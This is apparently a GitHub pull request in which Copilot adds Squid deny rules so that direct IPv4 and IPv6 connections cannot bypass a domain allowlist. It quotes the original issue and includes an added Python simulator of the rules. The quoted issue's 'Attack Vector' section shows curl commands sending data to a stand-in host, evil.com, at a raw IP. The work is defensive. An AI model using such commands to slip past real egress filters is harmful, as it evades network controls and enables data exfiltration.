
Copilot AI commented Jan 17, 2026

Direct IP+TLS connections bypass domain-based filtering since Squid cannot extract SNI when clients connect to raw IP addresses instead of hostnames.

Changes

  • IPv4 blocking: Added dstdom_regex ACL matching dotted-decimal format (^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$)
  • IPv6 blocking: Added ACL matching destinations containing colons (valid domains cannot contain colons per RFC 1123)
  • Rule placement: Deny rules placed before domain allowlist checks

Generated Squid config now includes:

# Security: Block direct IP address connections
acl dest_is_ipv4 dstdom_regex ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$
acl dest_is_ipv6 dstdom_regex :
http_access deny dest_is_ipv4
http_access deny dest_is_ipv6

Design notes

  • Uses bounded quantifiers {1,3} instead of + to prevent ReDoS
  • Intentionally over-inclusive (blocks 999.999.999.999) — security blocklist should be broad
  • Colon detection is safe for IPv6 since dstdom_regex only matches destination host, not URL paths

Original prompt

This section details the original issue you should resolve

<issue_title>[Security] Direct IP + TLS connections may bypass domain filtering</issue_title>
<issue_description>## Priority
P1 - High

Summary

When a client connects directly to an IP address using HTTPS (without a domain name), Squid cannot extract SNI information. This may allow bypassing domain-based filtering.

Current Behavior

Normal HTTPS request:

CONNECT github.com:443 HTTP/1.1
→ Squid extracts "github.com" from CONNECT request
→ Domain ACL check performed

Direct IP HTTPS request:

CONNECT 140.82.114.4:443 HTTP/1.1
→ Squid sees only IP address
→ No domain to match against ACL

Attack Vector

# Attacker knows the IP of evil.com
EVIL_IP=$(dig +short evil.com)

# Direct IP connection - no domain in request
curl --resolve evil.com:443:$EVIL_IP https://evil.com/exfiltrate
# Or even simpler:
curl -k https://$EVIL_IP/exfiltrate

Current Mitigation

Host-level iptables has a default deny rule that should block traffic to unknown IPs:

  • Only traffic to Squid (172.30.0.10) and DNS servers is allowed
  • All other outbound traffic is blocked

Verification Needed

Test whether direct IP connections are blocked:

sudo awf --allow-domains example.com -- /bin/bash -c '
  echo "--- Test 1: Via domain name ---"
  curl -s -o /dev/null -w "%{http_code}\n" https://example.com
  
  echo "--- Test 2: Via direct IP ---"
  curl -s -o /dev/null -w "%{http_code}\n" --max-time 5 https://93.184.216.34 2>&1 || echo "Failed/Blocked"
  
  echo "--- Test 3: Check Squid log ---"
  sleep 2
  cat /tmp/awf-*/squid-logs/access.log | tail -5
'

Expected Behavior

Direct IP connections should be blocked by:

  1. Squid ACL: Explicit deny for non-domain CONNECT requests
  2. Host iptables: Default deny for non-whitelisted destinations

Proposed Fix

Option A: Explicit Squid ACL for IP-based CONNECT

Add to src/squid-config.ts:

# Deny CONNECT to IP addresses (no domain)
acl ip_connect dstdom_regex ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$
http_access deny ip_connect

Option B: Verify host iptables blocks this

Ensure default deny rule catches this case:

# In src/host-iptables.ts
# Verify: -A FW_WRAPPER -j DROP (default deny)

Files to Modify

  • src/squid-config.ts - Add IP CONNECT deny rule
  • src/squid-config.test.ts - Test IP CONNECT is denied
  • Verification script for testing

Testing

  • Direct IP HTTPS is blocked
  • Domain-based HTTPS still works
  • Squid logs show IP CONNECT attempts as denied
  • Host iptables provides backup blocking</issue_description>

Comments on the Issue (you are @copilot in this section)


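To see how the two deny rules and their placement behave on the request lines from the issue, here is an added simulator (not code from this PR or the project) that applies the ACL regexes from the generated config to a CONNECT target in the same http_access order. connect_host, http_access and decide are hypothetical helpers; the bracket stripping for IPv6 literals and the dstdomain-style subdomain match are assumptions about Squid's behaviour, and the request lines are constructed samples.

```python
import re

# ACL regexes exactly as in the generated Squid config from the PR description.
DEST_IS_IPV4 = re.compile(r"^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$")
DEST_IS_IPV6 = re.compile(r":")  # any colon: no valid hostname contains one

def connect_host(request_line: str) -> str:
    """Pull the destination host out of a CONNECT request line.

    Hypothetical stand-in for Squid's own parsing; an IPv6 literal arrives
    bracketed ("[2001:db8::1]:443") and the brackets are stripped here.
    """
    method, target, _version = request_line.split()
    if method != "CONNECT":
        raise ValueError("only CONNECT requests carry a host:port target")
    host, _sep, _port = target.rpartition(":")
    return host.strip("[]").lower()

def http_access(host: str, allowed_domains: list[str]) -> tuple[str, str]:
    """Evaluate the http_access lines in the order the PR places them:
    both IP deny rules first, then the domain allowlist, then default deny.
    Returns (verdict, name of the rule that decided it)."""
    if DEST_IS_IPV4.match(host):
        return ("deny", "dest_is_ipv4")
    if DEST_IS_IPV6.search(host):
        return ("deny", "dest_is_ipv6")
    for domain in allowed_domains:
        # dstdomain-style match (assumed): the domain itself or any subdomain
        if host == domain or host.endswith("." + domain):
            return ("allow", "allowed_domains")
    return ("deny", "default")

def decide(request_line: str, allowed_domains: list[str]) -> tuple[str, str]:
    return http_access(connect_host(request_line), allowed_domains)

if __name__ == "__main__":
    allow = ["github.com"]
    # Constructed request lines covering the cases from the issue and the PR.
    for line in [
        "CONNECT github.com:443 HTTP/1.1",       # normal HTTPS: allowed
        "CONNECT 140.82.114.4:443 HTTP/1.1",     # raw IPv4 from the issue: denied
        "CONNECT [2001:db8::1]:443 HTTP/1.1",    # raw IPv6: denied by the colon rule
        "CONNECT 999.999.999.999:443 HTTP/1.1",  # not a real IP, still denied (over-inclusive)
        "CONNECT evil.com:443 HTTP/1.1",         # curl --resolve still sends the name: default deny
    ]:
        print(f"{line:42} -> {decide(line, allow)}")
```

The simulator only ever sees the literal CONNECT host; Squid's dstdom_regex can attempt a reverse DNS lookup of an IP destination unless the ACL carries the -n flag, so when verifying the real config check that the regex is tested against the literal address and not a PTR name.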

Copilot AI and others added 2 commits January 17, 2026 21:15
Co-authored-by: Mossaka <5447827+Mossaka@users.noreply.github.com>
Co-authored-by: Mossaka <5447827+Mossaka@users.noreply.github.com>
Copilot AI changed the title from "[WIP] Fix direct IP and TLS connections bypassing domain filtering" to "fix: block direct IP address connections to prevent domain filter bypass" Jan 17, 2026
Copilot AI requested a review from Mossaka January 17, 2026 21:18
@Mossaka Mossaka marked this pull request as ready for review January 18, 2026 01:38
@github-actions

✅ Coverage Check Passed

Overall Coverage

Metric Base PR Delta
Lines 77.88% 77.88% ➡️ +0.00%
Statements 77.94% 77.94% ➡️ +0.00%
Functions 77.29% 77.29% ➡️ +0.00%
Branches 71.00% 71.00% ➡️ +0.00%

Coverage comparison generated by scripts/ci/compare-coverage.ts

Development

Successfully merging this pull request may close these issues.

[Security] Direct IP + TLS connections may bypass domain filtering